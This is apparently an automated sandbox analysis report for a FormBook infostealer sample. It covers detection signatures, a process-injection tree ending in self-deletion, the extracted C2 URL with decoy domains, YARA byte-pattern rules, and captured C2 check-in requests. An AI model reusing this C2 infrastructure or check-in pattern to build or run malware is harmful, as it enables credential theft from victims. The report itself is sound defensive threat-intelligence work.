Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report OrderKLB210568.exe

Overview

General Information

Sample Name:OrderKLB210568.exe
Analysis ID:433298
MD5:759b0d51f128f54e516ad1941a896d77
SHA1:13e8d9d44cf15bcfc43952eebc3f10fcafed23a3
SHA256:a08bf89a7e4c15fb33684e268199df85727a6ab759a1d7f3d5ba2b7a0e49f17a
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OrderKLB210568.exe (PID: 6920 cmdline: 'C:\Users\user\Desktop\OrderKLB210568.exe' MD5: 759B0D51F128F54E516AD1941A896D77)
    • OrderKLB210568.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\OrderKLB210568.exe' MD5: 759B0D51F128F54E516AD1941A896D77)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6784 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 6364 cmdline: /c del 'C:\Users\user\Desktop\OrderKLB210568.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.brochusuell.com/noor/"], "decoy": ["dwlm003.com", "plafon.one", "spacemazevr.com", "geniuslims.com", "selayvolkanwedding.com", "jarsofjoybylinathomas.com", "crosshatch-culinary.com", "mortenmortensen.com", "astromaritravel.com", "that-poor-girl.com", "kovalchukinteriors.com", "hoppingnations.net", "thequbi.com", "shoppermatic.com", "listofcannabinoids.com", "cottoneco.com", "betsrhodeisland.com", "cheerythoughts.com", "joyeriaguitzel.com", "marryobaidanjum.com", "globalapp.net", "ptuananh.club", "headstailsquiz.com", "centerdei.com", "voyagoezy.com", "mysftech.com", "makpumpiran.com", "infathguation.com", "icandrawanything.com", "condorclay.com", "weightlossguruji.com", "zhsysw.com", "radiogogy.com", "pocketeap.com", "gofloorsgo.com", "60-21stave.com", "juliamade.com", "diariodebrasilia.net", "estasenfamilia.com", "agaperpetual.com", "casualcool.xyz", "hfdfg.com", "uipoll.cloud", "indyafilmco.com", "avedonalchemy.online", "store-36.com", "trueandbare.com", "entrenandoamican.com", "tcheaptvwdmall.com", "pirates-bay.gifts", "gamesuptodate.com", "sotoki.com", "pinnacleautism.com", "xbzjist.com", "agencysevenadstrack.com", "atelierbeaumur.site", "stoptraffickingtc.com", "velvetlaceextensions.com", "sanidhestela.com", "crisstings.com", "gshockkuwait.com", "blaxies3.com", "customtiletables.com", "scgcarriers.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.OrderKLB210568.exe.22b0000.3.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.OrderKLB210568.exe.22b0000.3.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.OrderKLB210568.exe.22b0000.3.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        1.2.OrderKLB210568.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.OrderKLB210568.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.brochusuell.com/noor/"], "decoy": ["dwlm003.com", "plafon.one", "spacemazevr.com", "geniuslims.com", "selayvolkanwedding.com", "jarsofjoybylinathomas.com", "crosshatch-culinary.com", "mortenmortensen.com", "astromaritravel.com", "that-poor-girl.com", "kovalchukinteriors.com", "hoppingnations.net", "thequbi.com", "shoppermatic.com", "listofcannabinoids.com", "cottoneco.com", "betsrhodeisland.com", "cheerythoughts.com", "joyeriaguitzel.com", "marryobaidanjum.com", "globalapp.net", "ptuananh.club", "headstailsquiz.com", "centerdei.com", "voyagoezy.com", "mysftech.com", "makpumpiran.com", "infathguation.com", "icandrawanything.com", "condorclay.com", "weightlossguruji.com", "zhsysw.com", "radiogogy.com", "pocketeap.com", "gofloorsgo.com", "60-21stave.com", "juliamade.com", "diariodebrasilia.net", "estasenfamilia.com", "agaperpetual.com", "casualcool.xyz", "hfdfg.com", "uipoll.cloud", "indyafilmco.com", "avedonalchemy.online", "store-36.com", "trueandbare.com", "entrenandoamican.com", "tcheaptvwdmall.com", "pirates-bay.gifts", "gamesuptodate.com", "sotoki.com", "pinnacleautism.com", "xbzjist.com", "agencysevenadstrack.com", "atelierbeaumur.site", "stoptraffickingtc.com", "velvetlaceextensions.com", "sanidhestela.com", "crisstings.com", "gshockkuwait.com", "blaxies3.com", "customtiletables.com", "scgcarriers.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: OrderKLB210568.exeReversingLabs: Detection: 32%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.667634881.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922673360.0000000001250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720819414.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720216113.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922695254.0000000001280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.664276844.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.922550809.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.720881114.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.OrderKLB210568.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.OrderKLB210568.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: OrderKLB210568.exeJoe Sandbox ML: detected
          Source: 1.2.OrderKLB210568.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.33fcd80.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.OrderKLB210568.exe.22b0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.raserver.exe.5607960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.1.OrderKLB210568.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: OrderKLB210568.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: OrderKLB210568.exe, 00000000.00000003.659659585.0000000009A30000.00000004.00000001.sdmp, OrderKLB210568.exe, 00000001.00000002.721198139.0000000000BAF000.00000040.00000001.sdmp, raserver.exe, 00000009.00000002.923390978.00000000051EF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: OrderKLB210568.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdbGCTL source: OrderKLB210568.exe, 00000001.00000002.720929756.0000000000A30000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.712034262.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 0_2_0040263E FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 74.208.236.54:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 74.208.236.54:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49769 -> 74.208.236.54:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.brochusuell.com/noor/
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 HTTP/1.1Host: www.trueandbare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 HTTP/1.1Host: www.velvetlaceextensions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 HTTP/1.1Host: www.pinnacleautism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 HTTP/1.1Host: www.scgcarriers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 HTTP/1.1Host: www.customtiletables.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 HTTP/1.1Host: www.marryobaidanjum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 HTTP/1.1Host: www.astromaritravel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 HTTP/1.1Host: www.plafon.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 104.16.13.194 104.16.13.194
          Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: Joe Sandbox ViewASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=4rG107LnOcmcuziIBv//fTWAPRyuaqL3ZCNKQGbegtiOA/J/96Y+2s4SPBA+G2lg6sqa&z6A=SROlIdu0 HTTP/1.1Host: www.trueandbare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=HXv2ci8qflo+sTzlFu6p6ayrdzzy8jUJJ1L5hJzxjEzCyp3/Ui7nWA8VYIXOKVKH4kcG&z6A=SROlIdu0 HTTP/1.1Host: www.velvetlaceextensions.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=yBBObmCyAJHV9q/laG6R4VeleE6hM9O/9rRknywdqzDMYOPfeqQhGmZFlzULPSD48dad&z6A=SROlIdu0 HTTP/1.1Host: www.pinnacleautism.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=MrymD1JTSi9icjGKk8gDaU+0x7uPJ/DMShO0SAEbIObMq4sdMjmwzvuhTtB1BmEBq3Cn&z6A=SROlIdu0 HTTP/1.1Host: www.scgcarriers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=aLSZaEbZcY+nJL/coxA+SeOeWAYt8B9E/LcznQPuCd+SSEpvsuzJsFlKySIeZ1LxQ2fR&z6A=SROlIdu0 HTTP/1.1Host: www.customtiletables.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=KyjbU3AKX/1ra4+yobi9yViduRe0x0FUVCXAE/BWsKVHYHaI6gSvGLTvxwAp00IgFIet&z6A=SROlIdu0 HTTP/1.1Host: www.marryobaidanjum.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=AHmkjMmF5A51F9E2l+bDZjEpvTE04T0IuK3gjYUfTOhZyeiT49VRPb60+qMIaT57BRzI&z6A=SROlIdu0 HTTP/1.1Host: www.astromaritravel.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /noor/?1bWh=xnNqGXCWkFApROrJz350BdHFb13BnEMQPSq+Heyas7SGX58S4jH7yXEPKWiH2cfubfT5&z6A=SROlIdu0 HTTP/1.1Host: www.plafon.oneConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.tcheaptvwdmall.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1364Connection: closeDate: Fri, 11 Jun 2021 13:43:42 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 7
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: OrderKLB210568.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: OrderKLB210568.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000004.00000000.670973820.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000000.688771289.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
